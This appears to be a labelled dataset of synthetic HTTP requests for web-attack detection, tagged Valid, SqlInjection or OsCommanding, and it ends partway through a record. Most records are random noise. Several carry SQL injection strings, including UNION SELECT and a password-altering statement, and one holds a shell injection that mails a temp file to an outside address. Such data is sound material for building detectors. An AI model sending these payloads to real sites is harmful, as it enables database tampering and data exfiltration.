Accept-Language: *;q=0.8
Cache-Control: only-if-cached
Client-ip: 87.242.227.184
Cookie: mgtjteiar= nscriptqw;0y_3i=6a1o;rT8w=Bialymingtrr;Aeotnghtlrni=ciOeh5ascriptt'3ow;IwsMhseinwperi=88496469
Cookie2: $Version="727"
Date: Sun, 14 Oct 07 22:18:07 UTC
ETag: W/"2rwKyzJKSWhOnVFy"
Expect: 100-continue
From: adhnoei1@eSnoer.st
If-Modified-Since: Fri, 23 Oct 09 02:38:03 GMT
If-Unmodified-Since: Tue, 12 Sep 06 17:16:17 GMT
If-Match: "c8b_lfZVruANLKYbR@"
If-None-Match: "ZxMJZQ.2d49_GbCNV"
If-Range: "c5_Z7VvEFOogpCFs"
Max-Forwards: 1123
MIME-Version: 4.8
Pragma: ctrzesvg='oi7eeuem'
Proxy-Authorization: NTLM NlJ1bGptYzlzZXBvYTdiam5pdDlubnNtSXR0aXRpY25iYWVoaDA4bGVpcW5z
Authorization: eoosk fnzwa=c2eago
Range: -3238,-691,-223750
Referer: /vcdozv/9m5mejp8/eit7oCov/2lbl/cllfx.cfm
TE: gzip;q=0.2,trailers,deflate;q=0.8
Trailer: Range
User-Agent: Mozilla/0.2 (Machintosh; U; Mac OS X 5.4; ir-Ra; rv:7.0.4) Gecko/04919452
UA-CPU: StrongARM
UA-Disp: 5443,1499,16
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 4914x5963
Via: 3.3 25.18.134.85, rSco/5.7 133.233.102.153
Transfer-Encoding: gzip
Upgrade: act/7.7, inbw/3.6
Warning: 072 www.eIatdhnV.html "Yper3dr" "Tue, 24 Feb 09 05:55:30 UTC"
X-Forwarded-For: 125.81.27.179
X-Serial-Number: 327702205717746
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 17126
Start - Id: 21200
class: Valid
GET /rJ4-3S-/oYXFn37l/wMEelw7KRnXfhimS/rT.YKDkYt/s3mcE/neaxlOnl/gyt8msiedeii/PAr.htm?bhavingpasswd3Ec=9&fcdEaobc6rc6ne=854537737&avnrtf=l3V8vHdqy1z1&OA03=1Hqot&raxaceusnpib=72780&aokyrceildRue=htpassrnure-ie%25k8p HTTP/1.1
Host: 234.158.235.93
Connection: keep-alive
Accept: text/plain
Accept-Charset: x-mac-japanese;q=0.4, iso-2022-jp, x-mac-arabic;q=0.8, windows-1250;q=0.0, euc-kr;q=0.6
Accept-Encoding: gzip, identity;q=0.5, compress, compress;q=0.0
Accept-Language: *;q=0.2
Cache-Control: no-transform
Client-ip: 218.12.167.71
Cookie: RTSsock_streamShttpuXbM=tAhdeoslahb;LdEPK=50029;B_kchildrstmpEq2=@7Ii;neIzr=t6u:ss7;MroptcbsamfThvUG=neotSge|Hdeeo;SdeleteRAUtX=regLa1S9BBnj
Cookie2: $Version="1"
Date: Sat, 07 Apr 07 10:15:06 CET
ETag: "XSsbP1GsdwUH1Vx"
Expect: teouesti
From: iiteLaco@s0ovono0.de
If-Modified-Since: Fri, 18 Jul 08 11:47:12 UTC
If-Unmodified-Since: Fri, 04 Jan 08 01:56:07 CET
If-Match: *
If-None-Match: *
If-Range: Wed, 16 Nov 05 20:34:31 UTC
Max-Forwards: 7
MIME-Version: 5.2
Pragma: no-cache
Proxy-Authorization: NTLM dENlbDRjb3N5YTB0U2hlZGlOZWhhdG5vemU5amhlbWF1OFdFdzRsYXNubg==
Authorization: Basic YWFpaHlkb246dGhldGRsdA==
Range: 750-,720-8
Referer: /yfmth1oe.jpeg
TE: trailers
Trailer: Host
User-Agent: ei9svurw1itmk
UA-CPU: MIPS
UA-Disp: 158,905,16
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 402x543
Via: 2.4 www.hrcle2wo.js, 3.7 185.81.59.188
Transfer-Encoding: e02It; seEqiTtH=goruorgw
Upgrade: paa/5.3, a9Au/8.0
Warning: 837 www.amWce.png "H1oteohur" 
X-Forwarded-For: 188.221.207.247
X-Serial-Number: 59070320444976577945
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 21200
Start - Id: 27775
class: Valid
GET /rveugecrriBirmohr8aq/v4MjC/nMGiX5CeFx./uZ_cvEv2%uecGi1q/seIdgHsGQToAuFHA9wu/t.3tycc6pvkFXW/degottu74wteloxu/vUinnyn40ZW@/37unyees1ouGtexia.php4?9i=5 HTTP/1.0
Host: www.easb.ch
Connection: Pwimed0
Accept: audio/basic, text/*;q=0.5
Accept-Charset: iso-8859-8-i;q=0.4
Accept-Encoding: *;q=0.6
Accept-Language: *
Cache-Control: uxehaN=w
Client-ip: 138.75.107.168
Cookie: iwwr0ljo=68372521;u-documentqxtb3OQI=hp5;7GO@UV=:p\O;dndakogeTmadi=456408914;h2E3e=6noharwabeue;e2xj3aeeiahTa=4i
Cookie2: $Version="5"
Date: Tue, 02 Aug 05 01:18:57 CET
ETag: W/"0uqynEnDZO61uWa2vj"
Expect: 100-continue
From: omsc@oihc6.biz
If-Modified-Since: Mon, 28 Mar 05 17:22:12 UTC
If-Unmodified-Since: Tue, 20 Nov 07 14:26:07 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 2909
MIME-Version: 2.1
Pragma: no-cache
Proxy-Authorization: NTLM OW1sc2hlZWo3ZTN5YnNvZWFpbmZ3cm1ydHJ1b3dhbmVvM2ViYW1BaHM=
Authorization: NTLM ZXNoZ0x2bm4yaXRtbFN0ZW5vdG1sQmV0TGVpYWhvenNhYmVl
Range: 360141-,-759683
Referer: http://seim.fr/es3nee/a2b6/oatnoze/rtsr4she.aspx
TE: trailers,chunked;q=0.6,trailers
Trailer: Host
User-Agent: eheE6i (nwkWWl; m.2M32zT; oRULX.@oj; kMlTsbL@)
UA-CPU: x86
UA-Disp: 158,739,32
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 483x5740
Via: oei8h/0.5 173.15.81.235:4840
Transfer-Encoding: compress
Upgrade: sDOr/8.7, ola/6.0, voie/0.2, 3romlw/9.3, Zm9o/0.9
Warning: 643 114.204.41.96 "onreoj3eneols3hnaj" "Tue, 25 May 04 07:31:58 UTC"
X-Forwarded-For: 213.115.160.45
X-Serial-Number: 00771445760189664084
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 27775
Start - Id: 12108
class: Valid
GET /taEJbct/ynhlnbtA/07e/t8Z2m@9elibTetcprocessing-instruction_WL/d1rvlei/wW7gataah2Dilh.aspx?nVoet=%3D%25%7Cddeti&cmdQ2P4MZ=%7Cinserttmptr3rr%3Esi0%7E&doeOhmot=s5&ntl=sTbx HTTP/1.1
Host: www.tkaJnEq.gov
Connection: keep-alive
Accept: audio/*;q=0.1, video/*;q=0.4
Accept-Charset: x-mac-chinesesimp;q=0.3
Accept-Encoding: compress
Accept-Language: *;q=0.5
Cache-Control: no-transform
Client-ip: 161.155.47.193
Cookie: ieiophl8fsti=879705;aa1nsrt=77567;naarwgnar0k=38;childWA7includeIcmdh=itelnet
Cookie2: $Version="66"
Date: Thu, 28 Jan 10 12:48:10 CET
ETag: "B_yWLx.fRRhYiw6gV"
Expect: Epfsht
From: resare@sofeos4Um.cz
If-Modified-Since: Sun, 21 Aug 05 09:53:28 UTC
If-Unmodified-Since: Thu, 07 Aug 08 03:23:49 GMT
If-Match: *
If-None-Match: "09zJkciSZG8S6VkiC1fx"
If-Range: Tue, 25 Nov 08 12:36:11 UTC
Max-Forwards: 807
MIME-Version: 9.6
Pragma: NnarhrE='Borot'
Proxy-Authorization: tdsfn gn6Hi=ruDos9tw
Authorization: Digest username="eLfnan"
Range: 528333-
Referer: http://plctrpu.fr/axali/3s6aei/aqblrs.jsp
TE: deflate;q=0.4
Trailer: Trailer
User-Agent: Mozilla/3.3 (compatible; MSIE 6.8; Win98; hnebdMenwo; gjusa5fanl; Ohngda)
UA-CPU: PowerPC
UA-Disp: 3494,5887,8
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 6469x6483
Via: 8.6 197.228.205.74:00
Transfer-Encoding: identity
Upgrade: Cdr/9.5, gton/2.2
Warning: 364 www.rnndhhu.html "lNiB7of9mccT8t4" 
X-Forwarded-For: 168.173.15.142
X-Serial-Number: 572256
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 12108
Start - Id: 35445
class: SqlInjection
POST /echoiBVor.png? HTTP/1.0
Content-Length: 204
Content-Language: idwk,ot
Content-Encoding: gzip
Content-Location: http://hieytgd.biz/24uoe/jepoFe/l6f3siO.css
Content-MD5: bmN5bmJscVp0ZTBlcjZpcg==
Content-Type: application/x-www-form-urlencoded
Last-Modified: Wed, 30 Nov 05 18:19:43 GMT
Host: www.Ka0Lnatbe.de:80
Connection: keep-alive
Accept: application/rtf;q=0.0, video/*;q=0.9, application/*;q=0.0
Accept-Charset: windows-1251, x-mac-hebrew, ks_c_5601-1987, koi8;q=0.9, ks_c_5601-1987
Accept-Encoding: *
Accept-Language: tsva-nam;q=0.9, joRk-oyDrHqa;q=0.2, thrwi1le-etepa9n7;q=0.0, arzei-ada
Cache-Control: no-cache
Client-ip: 208.4.23.62
Cookie: atPl6hhraq=5
Cookie2: $Version="506"
Date: Fri, 21 Oct 05 09:17:54 CET
From: adnsm@M3eOy0te.org
If-Modified-Since: Thu, 29 Jun 06 09:20:38 UTC
If-Match: *
If-Range: Tue, 01 Jun 04 23:56:17 CET
Max-Forwards: 523
Pragma: no-cache
Authorization: Digest algorithm=MD5
Range: 8-,99-3,-630
Referer: http://www.8iwreetu.gov/eqGst/ntggrlgl/monolhe/rsn3i6o.conf
User-Agent: ;alter    table itrans     set password   =   '7tauFy'    where     name =    'ri';
Transfer-Encoding: deflate
X-Forwarded-For: 88.8.97.255

rophokvaoen1ita=I'n[eastmpni&okghs= n0 s(iteapasR(&Egco7NThbrokti=zdypse%&elyt4=sweoul&retNDhrrfaa=vm&uHYnulloR=athesirTtjwhtmcl&SE9z=560817&ssy0=49&lpTaeotrodgdtoH=dse a7eddr7ee&etennAparbn=683

End - Id: 35445
Start - Id: 42049
class: SqlInjection
GET /puElakoro/3hmnuuoeRtbksQiolda/z_hO.olU/eMIvWhDNPWvMRH0paO2/hveg0ghmrusie3/s6wbLY0N92Mkq/qTldmS53oeaO.cfm?eimily=Sreplace+4&naafhih=%27+++%29+++++UNION++ALL+SELECT++++3+++FROM++++6miielhC+++++WHERE++++%28++++%27%27%3D%27&haeet=et&mTcxpasswdxp_Gechot=eireahosnintTtt5&aUaaTivyr=3&kuixeo9s7C7nmi=37&dtgeB2t7msuu=e%3Bfs%2BIeee HTTP/1.0
Host: 124.147.88.155
Connection: 4esi
Accept: image/gif;q=0.1, application/rtf
Accept-Charset: x-mac-turkish, hz-gb-2312
Accept-Encoding: 
Accept-Language: *;q=0.3
Cache-Control: rti='Eaar'
Client-ip: 105.206.136.193
Cookie: hiathnu=/aO;hglfvdAbvNn=55220061;c0=9;rHhplk=+muredlnm)dwDe;aemeap=yto
Cookie2: $Version="46"
Date: Tue, 09 Jun 09 22:29:58 UTC
ETag: "zWjqHOL2ecS3XXB"
Expect: 100-continue
From: lhrrhh9j@48Flats.biz
If-Modified-Since: Sat, 15 Oct 05 14:51:36 UTC
If-Unmodified-Since: Fri, 17 Oct 08 01:02:30 UTC
If-Match: "UAu7Nxi2ofVptVy"
If-None-Match: "YUHoO.iq_-Dgw9yy5"
If-Range: *
Max-Forwards: 83
MIME-Version: 8.6
Pragma: hohu=eOrbE
Proxy-Authorization: Digest nonce
Authorization: Basic ZHVwc2hzZ246N280N29l
Range: -7
Referer: http://www.2iaod.fr/i1oEnwcg/e1r0.cgi
TE: trailers
Trailer: Host
User-Agent: aidreet5e/4.5.2.4.1
UA-CPU: x86
UA-Disp: 7502,392,16
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 307x472
Via: 7.4 www.t6X6eh.tiff, 5.3 www.remfWiIg.shtml
Transfer-Encoding: gzip
Upgrade: ilnpe/6.7, ieqo/6.7
Warning: 362 154.207.249.192 "5mtmteeoeiermsUflat" 
X-Forwarded-For: 183.45.204.126
X-Serial-Number: 001394948859071824
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 42049
Start - Id: 6973
class: Valid
PUT /mP/GPc-BxKgs/aVNNq6_@0P4PoXm6-kZ0/cQst0K/cHmTWgxSg/sgu9wv2erttat6eee/nRyKWNmM/e_F7tPt7p10YcyzPJA2F/c-e_Yh/amN/feo7swsereztTrt/3TfZrjkD@QadminhD.png? HTTP/1.0
Content-Length: 247
Content-Language: 3rI,itgnlcf,riEedLa
Content-Encoding: identity
Content-Location: /LhrnNut.exe
Content-MD5: ZW8xdW5yYWV0eGRxRXN2eA==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 01 Jan 10 17:18:14 UTC
Last-Modified: Mon, 26 Apr 10 03:37:07 CET
Host: www.fiT5ansf.org
Connection: close
Accept: */*;q=0.5
Accept-Charset: *;q=0.5
Accept-Encoding: *;q=0.2
Accept-Language: u-b8uchhd;q=0.4, 9-19j;q=0.3
Cache-Control: no-store
Client-ip: 167.207.19.9
Cookie: FSendetpan0lazq=qih9;OWAV0CRIlocationsdocumentS=a7VEEMyh1tqo;syfrn7axiUdvti=rneTecet;am=s xml=xsa
Cookie2: $Version="082"
Date: Fri, 12 May 06 05:11:47 UTC
ETag: W/"NL_m1mDqJIQByLH"
Expect: 1em8
From: coetw@Dezgd.biz
If-Modified-Since: Tue, 15 Apr 08 02:50:25 GMT
If-Unmodified-Since: Sat, 25 Sep 04 08:15:43 CET
If-Match: *
If-None-Match: "GG3aKojE_-mp5_JX@j"
If-Range: Thu, 10 Dec 09 06:29:24 UTC
Max-Forwards: 9367
MIME-Version: 2.4
Pragma: no-cache
Proxy-Authorization: Digest qop=auth
Authorization: etqed ta3i=hoyrwo
Range: 2338-,-6,504171-
Referer: http://ehadai9d.ch/shedrscc/jicr5nen/hrpava/ynbr.asmx
TE: gzip;q=0.4,trailers
Trailer: Max-Forwards
User-Agent: Mozilla/2.6 (compatible; Konqueror/4.8; Solaris; aosijb; zasnsiss)
UA-CPU: 68000
UA-Disp: 535,687,8
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 040x289
Via: 2.6 www.NaIemne.png, 1.0 145.231.79.134, HTTP/3.7 www.qwesac.jpeg:87691
Transfer-Encoding: gzip
Upgrade: srd/5.1, ndhns/4.1
Warning: 295 140.22.217.163 "uv2fUxytlf3rEnqh" "Sun, 03 Jun 07 20:15:54 GMT"
X-Forwarded-For: 5.129.82.226
X-Serial-Number: 95729667
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

jqf2=lcheaoteeeuh&bE74VxaN=haott&da4DQKuHFKFz= lRya0ecn&asryeRfse4=92374982&ocit5pG=ulffctdioomtre4hwp-&etrruhn3aaybsne=91230640&JH6JCevalgiplo=9modralytndagpu&CcpassthruIbKb@o1=acToe2mrirtheeA&ctidQloRFMh=700022&beypAar=703315696&ntefyp=200906204

End - Id: 6973
Start - Id: 26774
class: Valid
GET /ed/aFv-3J/nh.3g3SXcu28C@_giE/bQ7_JH5Q0JABcLaug8V/nWc.eZ0YGFe/2slgNEsnenlBt/asTRrBr73jBq/xmlti7wPPr/yUi9Lrni_dl/9nLjD0mpU-5/ueMeghed4OnnhryeNRb.js?mH40vp=nnheestiwgaatniN&hwqeicetlc=9&nxaaeaxapdamo7=na%3Cs&dtq5eau4slncN=omNc&ihrnybw=8562720&xee4V01Rk=pa&abgesr4s6osscrp=ah+diu&awttWo=tUbSD&dE=%26e&hehmoohrtef=thrmstd8l&LgEHdnlt=oo0fPW&mAxsarS4=yXw%40eIeJ8 HTTP/1.0
Host: www.rsdgbgs.cz
Connection: ecgiecz
Accept: video/*;q=0.9
Accept-Charset: euc-cn;q=0.3
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-cache
Client-ip: 120.60.149.77
Cookie: sss226hraattp=l;s75c=n4hotmaohtie;nqR-hX@=aP7mB
Cookie2: $Version="64"
Date: Sat, 17 Dec 05 12:29:42 GMT
ETag: "ecRAGY-3geTFtmku3"
Expect: 100-continue
From: uo62ugt@sLsomat.biz
If-Modified-Since: Sun, 17 Dec 06 23:13:32 CET
If-Unmodified-Since: Sun, 01 Apr 07 21:59:55 GMT
If-Match: "J2w8kFRyMkXghz8SY"
If-None-Match: "A@.P7kwTDNoQQRMBKp"
If-Range: Thu, 27 May 04 18:49:32 GMT
Max-Forwards: 3
MIME-Version: 1.0
Pragma: aeu='utn9eake'
Proxy-Authorization: desDsm geshl54E=ngonva
Authorization: Basic YTZ2QW5sOlN0SGd5Tjlv
Range: 76-3,2076-,-744104
Referer: /wsesytf/uIvE2/ae3iv/lMAimbe.html
TE: trailers,trailers
Trailer: From
User-Agent: 9Z.t0JBs http://www.oosUh.ch
UA-CPU: StrongARM
UA-Disp: 8774,317,16
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 358x270
Via: 5.8 108.153.117.13, HTTP/1.8 www.te5omOel.css:079, 1.8 www.be8aon.tiff
Transfer-Encoding: ri7r; fxr6=uau8
Upgrade: rrraa/9.2, boeih/0.1, thxga/5.3, daihfa/0.5
Warning: 136 www.ehRdg.jpeg "ee4de" "Tue, 22 Nov 05 24:02:23 UTC"
X-Forwarded-For: 132.196.150.167
X-Serial-Number: 1194043277645
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 26774
Start - Id: 5632
class: Valid
PUT /hatsetne/%upositionI2g/r8servicesVBGpFAmetaGs/nkiftihan/rwa@bkBK/0fqzX/rtl/e@C_.G2.jpg? HTTP/1.1
Content-Length: 66
Content-Language: ssrv,a
Content-Encoding: deflate
Content-Location: http://wT1d.st/eigns.png
Content-MD5: bHJ6dGx0dHJOZDlhb0VZbw==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 18 Oct 08 18:07:27 CET
Last-Modified: Thu, 24 Nov 05 03:31:08 UTC
Host: 157.89.133.201
Connection: keep-alive
Accept: */*;q=0.4
Accept-Charset: *;q=0.8
Accept-Encoding: identity;q=0.8
Accept-Language: *;q=0.0
Cache-Control: max-stale=2494
Client-ip: 248.232.138.60
Cookie: x8P_ZservicesCP4oe.=n04q9t
Cookie2: $Version="2"
Date: Wed, 14 Nov 07 16:05:32 UTC
ETag: W/"5_99s69o3YZTg9.dBwO"
Expect: 100-continue
From: noeLofs5@rseiiaono.biz
If-Modified-Since: Tue, 15 Jul 08 22:38:21 UTC
If-Unmodified-Since: Sun, 18 Jul 04 16:38:26 GMT
If-Match: "PNuJmQ@mmiQtvvkRz"
If-None-Match: "qm.JUqc76w5U0C8"
If-Range: *
Max-Forwards: 1078
MIME-Version: 9.8
Pragma: rtDd=gprik
Proxy-Authorization: eoaot ubahyefg=7a5iI
Authorization: Digest response="6f23F94f7a0dCC76dedEBD248f54Dc8e"
Range: 67795-,06619-,662301-47622
Referer: http://b2rlke.cz/n1t4seo/EspeeeeU/opTtei/mbexutet.cfm
TE: trailers,trailers,chunked;q=0.1
Trailer: If-Modified-Since
User-Agent: uSlaOiu/7.5.6.6
UA-CPU: x86
UA-Disp: 6817,0716,32
UA-OS: Win98
UA-Color: color32
UA-Pixels: 768x653
Via: 8.2 201.158.0.51
Transfer-Encoding: compress
Upgrade: han/8.7, 10s/1.0, cttH8e/9.6, tmdb/9.7, qlteR/5.3
Warning: 369 73.254.252.135 "st2nea" "Wed, 08 Nov 06 03:43:52 GMT"
X-Forwarded-For: 43.162.121.32
X-Serial-Number: 61444229813363
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~

elhsf=h1e3DliR3n7tCwkItg&Fc4Y5aChtpass=hpas?eB&ntiUsayUe3mldtt=m

End - Id: 5632
Start - Id: 2350
class: Valid
GET /fg2Yz9C13cc-/f4wiadmin7z42ECV/0kLOJkExpaL2ANPXYF/eeuO4tinha/ezAbh/H@y.jsp?ro8r8gu=uyugOr&uii=33406&ndb=aim%3Ceeve&gsroenolc=d4mcUehne&5sCLexec_5cA=eRAAGmKEmpt&BLbodyL=a%40ip&4processing-instruction.Fdrop=8933364876&stae6=ltj0a+t-5sock_streamacd2inanetr&ie4t=tatpntFibbb7hBsuei&vj4t5eMevnZ=p%3Er&zaeosolri=lr4Yrqt&5dEeswe=m1sqyJ&eqeeynb=riehdtahod&BRDULtx6y6W=xmla%25ol%24nti%27update&et5siqE=E HTTP/1.0
Host: 221.168.92.229:7942
Connection: close
Accept: text/*;q=0.2, text/*;q=0.8, image/*;q=0.0
Accept-Charset: *;q=0.1
Accept-Encoding: *;q=0.5
Accept-Language: *
Cache-Control: no-cache
Client-ip: 235.124.196.175
Cookie: mHBbx=3353902898;edde=eHHM@k1AERSv;yasg=72
Cookie2: $Version="470"
Date: Thu, 22 Jun 06 08:42:22 UTC
ETag: "5c7-vNXIuqgiPYh_yhiq"
Expect: 100-continue
From: eau5Sr@xrui3aws.st
If-Modified-Since: Fri, 26 May 06 10:53:27 CET
If-Unmodified-Since: Sun, 24 Jun 07 24:36:31 GMT
If-Match: *
If-None-Match: *
If-Range: Sun, 02 May 04 08:29:07 CET
Max-Forwards: 1
MIME-Version: 6.9
Pragma: no-cache
Proxy-Authorization: Digest response="32CC03ccCD2C4F02bb800C8DE1CCEbDB"
Authorization: Basic cGVjb3NsdDpzZXRkcg==
Range: -6000,-150
Referer: http://www.lhipNeeu.de/cwtlhs/p59sacd.txt
TE: trailers,trailers,trailers
Trailer: Warning
User-Agent: Mozilla/7.4 (Machintosh; U; PPC 2.9; aa-n2; rv:0.2.5) Gecko/81741826
UA-CPU: PowerPC
UA-Disp: 6863,178,16
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 3780x3384
Via: Ofd/4.3 129.23.63.125:7782
Transfer-Encoding: gzip
Upgrade: 74si/9.9, ixt/2.4, jarRcm/9.9, eiC/2.5
Warning: 884 73.36.206.89 "yeelewkm" "Sat, 05 May 07 13:44:17 GMT"
X-Forwarded-For: 9.20.198.184
X-Serial-Number: 67775
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 2350
Start - Id: 43501
class: OsCommanding
GET /e.zaXTqbIXiCBesaiV/beoroj31Te/Zk.png?mbp=laqe%7CvKQ%5Da&t04Ooje=aXl&7XHtHX=svarscript&h74tcis1hcali=%27+++%3B+cat+++%2Ftmp%2Fres++mail+++++stndchme%40geilteta.com+%3B&enhnrnlEoyhd4ew=%7Erzvo8elink7lf%3Fip0anrt&locationL1tmpMgzdRm=ahedsthtpc2aoa&eowrVoemyo=91662803&5s0aaaFUrn9taRg=wrMYVkA8Z&ae3aea=t-3PPr&am5ia0iee78=eYDH18pofFpm&tta0efslE=ihrtie&AofOoein=OvtEmr+tj&BjL9Dxterm=2vns HTTP/1.1
Host: www.1a6antt.de
Connection: close
Accept: text/*, application/*;q=0.2
Accept-Charset: koi8, windows-1253;q=0.3, cp-950, iso-8859-5;q=0.2
Accept-Encoding: 
Accept-Language: adrrd-a, dS-e, 2Tn-gtiw, bpeeoo1-Gwnnon;q=0.4, 3a-ifa;q=0.2
Cache-Control: max-age=0
Client-ip: 220.97.61.79
Cookie: Pp8noHi7nayle5=9095;0Adot=opun4Meen;tDideuHgL=ttrsmxx43aodmt;5O1uaot=$
Cookie2: $Version="629"
Date: Sun, 25 Mar 07 22:36:14 UTC
ETag: "i5b4tekVhyWTS7JAkw0"
Expect: 100-continue
From: ng6Ncd@ciehr.com
If-Modified-Since: Mon, 24 Sep 07 08:01:16 GMT
If-Unmodified-Since: Fri, 12 Jun 09 08:20:36 CET
If-Match: *
If-None-Match: "5jIqrngsvo7.AafNA"
If-Range: *
Max-Forwards: 5392
MIME-Version: 3.4
Pragma: no-cache
Proxy-Authorization: Basic bFJvZ25nOmVmVGNx
Authorization: snkh Atedst=vdsleg
Range: 32-61,4386-85
Referer: http://www.aapng.it/ihr0otd/zhmr.cgi
TE: trailers
Trailer: If-Range
User-Agent: n2FfjY http://www.w1wd.st
UA-CPU: MIPS
UA-Disp: 777,376,8
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 5281x2497
Via: aeewe/9.8 92.169.43.6, 6.1 www.lonZ.css:5209
Transfer-Encoding: gzip
Upgrade: kqj/8.1, ydnbd/4.5, 5cs/8.0, hcilT/8.3, 4abi/5.9
Warning: 149 77.181.7.29:346 "s7ap2mhklltrMwto2" "Wed, 09 Aug 06 21:48:51 CET"
X-Forwarded-For: 106.96.131.159
X-Serial-Number: 521013041943
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43501
Start - Id: 27106
class: Valid
GET /rksoeuajimdsecTtn/oi3/2T5/chkczns.sh?wdfutj3t=eOnbadrWbai&vatkhT=290&9W=rkteio%5CFY%3Bu8ol&v8esnrio=tTfa1rquay HTTP/1.1
Host: www.Le7IeG.fr
Connection: lUutgio
Accept: */*;q=0.3
Accept-Charset: us-ascii;q=0.0, euc-cn, iso-8859-9, gb2312;q=0.7
Accept-Encoding: compress;q=0.2, deflate, identity;q=0.3, identity;q=0.0
Accept-Language: eioatot-odfpeo;q=0.8, lm-dvmhuron
Cache-Control: only-if-cached
Client-ip: 119.214.253.148
Cookie: etj1svsiid=beeq;1a3hy=8;Tnake=82019;srre6u1seh4ea=s su:admin(x;hresrnoy=8102371;aeh7ifimtwmdhm=03
Cookie2: $Version="8"
Date: Fri, 04 Nov 05 03:19:47 GMT
ETag: "Zraz.1dsGJK0I4nHIhp"
Expect: 100-continue
From: hhafeiO@hshvl.net
If-Modified-Since: Mon, 22 Aug 05 16:42:21 CET
If-Unmodified-Since: Sun, 11 Jul 04 13:21:27 GMT
If-Match: *
If-None-Match: *
If-Range: Thu, 24 May 07 20:18:37 UTC
Max-Forwards: 1198
MIME-Version: 4.2
Pragma: no-cache
Proxy-Authorization: NTLM aHJzYXRvdHh5RG9wc251VmxnZUFvYU9ldGVuaGVzdHIxaHRvb2h0cmFycm0=
Authorization: FncaW eanEEiss=eceQ5r9
Range: -77
Referer: /hdg4.msf
TE: chunked;q=0.2
Trailer: Pragma
User-Agent: oIs7sinSmS (32Fyje.Cwe; eZZCr70S; g1AZN2; eCmObS)
UA-CPU: Sparc
UA-Disp: 724,7981,8
UA-OS: Linux
UA-Color: color32
UA-Pixels: 419x0757
Via: 2eNlac/0.2 www.aoroooc.png:7707, 3.6 132.200.0.250, 0.8 3.64.151.65
Transfer-Encoding: atlaO
Upgrade: tTow9n/5.9
Warning: 361 33.94.112.30 "aaityoctToiledbg" "Sun, 07 Sep 08 12:23:37 GMT"
X-Forwarded-For: 248.192.20.163
X-Serial-Number: 7609698
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 27106
Start - Id: 42184
class: SqlInjection
GET /ltaPkeras/4i.aspx?hette=25775&tenelgnZfmocEes=dueortrToo&shetrau=9258967055&3er=nglocation+zkp&rDoas=oi&tha=OR++++%27mneal%27++BETWEEN++%27R%27+++AND++++%27T%27 HTTP/1.0
Host: 6.154.99.236
Connection: close
Accept: */*
Accept-Charset: iso-8859-8;q=0.5, windows-1252
Accept-Encoding: *
Accept-Language: *;q=0.3
Cache-Control: no-cache
Client-ip: 171.126.113.10
Cookie: nYxgXoK=guL-jA;neE=89021;m3Achwmbrio=03663;sestt54ti=lrhsit)a1aDswE sa05r;clesbe=oa9shguci
Cookie2: $Version="16"
Date: Wed, 24 May 06 24:59:29 CET
ETag: "VKFBYpcbywJ_iX8q6h."
Expect: 9fto=lKrtw;ieBn=ntteqL
From: tnetRvi@fedacee.com
If-Modified-Since: Sat, 01 Jan 05 22:48:47 UTC
If-Unmodified-Since: Sun, 19 Mar 06 01:42:23 UTC
If-Match: "0QUaAY9PTPx.rFLEA6"
If-None-Match: *
If-Range: *
Max-Forwards: 6
MIME-Version: 5.3
Pragma: no-cache
Proxy-Authorization: Digest response="EDaFEE464Cd220549436Ba0ec5F670E1"
Authorization: tttnT asArsom=lnlse
Range: 1010-
Referer: http://www.lhstsfmt.be/i4sEhub/senGlte/qduz/9o5mi/nFv0ecp.tar
TE: chunked;q=0.4,chunked
Trailer: Proxy-Authorization
User-Agent: 2jlyh/8.3.3.5
UA-CPU: StrongARM
UA-Disp: 466,6159,8
UA-OS: Linux
UA-Color: color16
UA-Pixels: 124x5537
Via: wh3i86/8.6 84.214.31.249, 6.6 152.243.157.211
Transfer-Encoding: compress
Upgrade: ji40ad/7.5, ednwes/8.3, osi/1.7, eor/7.9
Warning: 601 194.137.96.43 "gotieoa7eticdpyar6l2" "Thu, 01 Mar 07 08:53:20 CET"
X-Forwarded-For: 229.231.134.44
X-Serial-Number: 41681316983855974
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42184
Start - Id: 12694
class: Valid
GET /7WjElP.T.z/kMhzM0/mE/1WuR8HduQt.jpg?IlctrO0aOerbdh=1941272&l9epSD=8Cm6FY&iihnSgsyuktmor=4941083&yrs5ERmg=hNraxna1ndtmp%5Cmyrcat HTTP/1.1
Host: 84.75.109.160:80
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.6
Accept-Encoding: compress, compress;q=0.7, identity;q=0.6, compress;q=0.3
Accept-Language: sres-yatfl, ssidtad-aste, g-q;q=0.7, delbC-aoe5ehrt, icnoB-tbdnisH
Cache-Control: min-fresh=91321
Client-ip: 141.142.203.127
Cookie: r0kan=oehirmmgdMformW d;odadgcPOy=7toisdokzis;ef3ia=gs6vl1
